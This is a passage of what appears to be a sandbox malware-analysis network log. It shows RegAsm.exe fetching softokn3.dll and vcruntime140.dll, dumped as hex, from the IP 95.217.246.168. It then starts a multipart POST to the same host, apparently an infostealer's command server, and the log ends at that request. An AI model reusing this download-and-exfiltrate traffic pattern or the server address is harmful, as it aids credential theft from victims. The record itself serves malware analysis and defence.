2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-26 09:03:18 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:20 UTC	159	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 09:03:21 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:20 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-26 09:03:21 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-26 09:03:21 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:22 UTC	163	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 09:03:23 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 09:03:23 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-04-26 09:03:23 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-26 09:03:23 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-26 09:03:23 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-04-26 09:03:23 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-26 09:03:24 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	95.217.246.168	443	7408	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 09:03:26 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
